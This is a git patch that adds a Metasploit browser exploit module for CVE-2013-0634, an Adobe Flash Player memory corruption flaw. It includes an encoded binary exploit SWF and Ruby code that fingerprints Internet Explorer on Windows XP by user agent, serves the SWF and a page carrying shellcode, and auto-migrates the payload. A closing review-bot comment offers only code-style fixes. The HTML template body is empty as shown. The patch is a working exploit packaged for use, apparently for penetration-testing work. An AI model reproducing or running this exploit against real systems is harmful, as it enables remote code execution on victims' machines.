From 766c408d86e666875356c83d35c9fdb029e9218d Mon Sep 17 00:00:00 2001
From: dukeBarman
Date: Sat, 18 Jan 2014 11:07:11 -0500
Subject: [PATCH] Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption
---
 data/exploits/CVE-2013-0634/Main.swf | Bin 0 -> 3312 bytes
 .../browser/adobe_flash_regex_value.rb | 157 ++++++++++++++++++
 2 files changed, 157 insertions(+)
 create mode 100755 data/exploits/CVE-2013-0634/Main.swf
 create mode 100755 modules/exploits/windows/browser/adobe_flash_regex_value.rb
diff --git a/data/exploits/CVE-2013-0634/Main.swf b/data/exploits/CVE-2013-0634/Main.swf new file mode 100755 index 0000000000000000000000000000000000000000..eee18c433691e114a1ba8cccb556ebc8ce821530 GIT binary patch literal 3312 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 literal 0 HcmV?d00001 diff --git a/modules/exploits/windows/browser/adobe_flash_regex_value.rb b/modules/exploits/windows/browser/adobe_flash_regex_value.rb new file mode 100755 index 0000000000..002e7265ed --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb 
@@ -0,0 +1,157 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::RopDb
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Adobe Flash Player 11.5 Remote Memory Corruption",
+ 'Description' => %q{
+ This module exploits a vulnerability found in the ActiveX component of Adobe
+ Flash Player before 11.5.502.149. By supplying a specially crafted swf file
+ with special regex value, it is possible to trigger an
+ memory corruption, which results in remote code execution under the context of the
+ user. This vulnerability has also been exploited in the wild in February 2013.
+ Please note in order to ensure reliability, the exploit is forced to modify
+ your URIPATH parameter to less than 3 characters, which may cause possible
+ URIPATH collisions.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Unknown', # malware sample
+ 'Boris "dukeBarman" Ryutin' # msf exploit
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-0634' ],
+ [ 'OSVDB', '89936'],
+ [ 'BID', '57787'],
+ [ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],
+ [ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],
+ [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],
+ [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],
+ [ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 1024
+ },
+ 'DefaultOptions' =>
+ {
+ 'InitialAutoRunScript' => 'migrate -f',
+ 'EXITFUNC' => 'thread',
+ 'HTTP::compression' => 'gzip',
+ 'HTTP::chunked' => true,
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Automatic', {} ],
+ [ 'IE 6 on Windows XP SP3', {'Rop' => nil } ],
+ [ 'IE 7 on Windows XP SP3', {'Rop' => nil } ],
+ [ 'IE 8 on Windows XP SP3', {'Rop' => nil } ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Feb 8 2013",
+ 'DefaultTarget' => 0))
+ end
+
+ def get_payload(t)
+ p = payload.encoded
+ return p
+ end
+
+ def get_target(agent)
+ #If the user is already specified by the user, we'll just use that
+ return target if target.name != 'Automatic'
+
+ if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
+ return targets[1] #IE 6 on Windows XP SP3
+
+ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
+ return targets[2] #IE 7 on Windows XP SP3
+
+ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
+ return targets[3] #IE 8 on Windows XP SP3
+
+ else
+ return nil
+ end
+
+ end
+
+ def on_request_uri(cli, request)
+ agent = request.headers['User-Agent']
+ my_target = get_target(agent)
+
+ # Avoid the attack if the victim doesn't have the same setup we're targeting
+ if my_target.nil?
+ print_error("Browser not supported: #{agent}")
+ send_not_found(cli)
+ return
+ end
+
+ print_status("Target selected: #{my_target.name}")
+ print_status("Client requesting: #{request.uri}")
+
+ swf_uri = "/#{@resource_name}.swf"
+ shellcode = get_payload(my_target).unpack("H*")[0]
+
+ # The SWF request itself
+ if request.uri =~ /\.swf$/
+ print_status("Sending SWF")
+ send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
+ return
+ end
+
+ html = %Q|
+
+
+
+
+
+
+
+
+
+ |
+
+ html = html.gsub(/^ {4}/, '')
+ print_status("Sending HTML")
+ send_response(cli, html, {'Content-Type'=>'text/html'})
+ end
+
+ def primer
+ hardcoded_uripath("/#{@resource_name}.swf")
+ end
+
+ def exploit
+ @swf = create_swf
+ @resource_name = Rex::Text.rand_text_alpha(5)
+ vprint_status("SWF Loaded: #{@swf.length.to_s} bytes")
+
+ datastore['URIPATH'] = datastore['URIPATH'] || random_uri
+ datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
+ datastore['URIPATH'] = datastore['URIPATH'][0,3] if datastore['URIPATH'].length > 3
+ print_warning("URIPATH set to #{datastore['URIPATH']}")
+ super
+ end
+
+ def create_swf
+ path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-0634", "Main.swf" )
+ fd = ::File.open( path, "rb" )
+ swf = fd.read(fd.stat.size)
+ fd.close
+ return swf
+ end
+
+end
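Review bot: `create_swf`, at the end of the hunk, opens Main.swf with `::File.open` and closes it by hand, so an exception from `fd.stat` or `fd.read` leaves the descriptor open; the block form closes it on every path and collapses the method body to `::File.open(path, "rb") { |fd| fd.read }` (or simply `::File.binread(path)`). Two smaller points in the same hunk: `get_payload(t)` never uses `t`, and the `shellcode` local in `on_request_uri` is not referenced by any visible line — the `%Q|` body is empty as extracted, so it may be consumed there; if it is not, both can be dropped. In `get_target` the three conditions join their regex matches with `and`, which should be `&&` to avoid the low-precedence surprise `and` carries in Ruby.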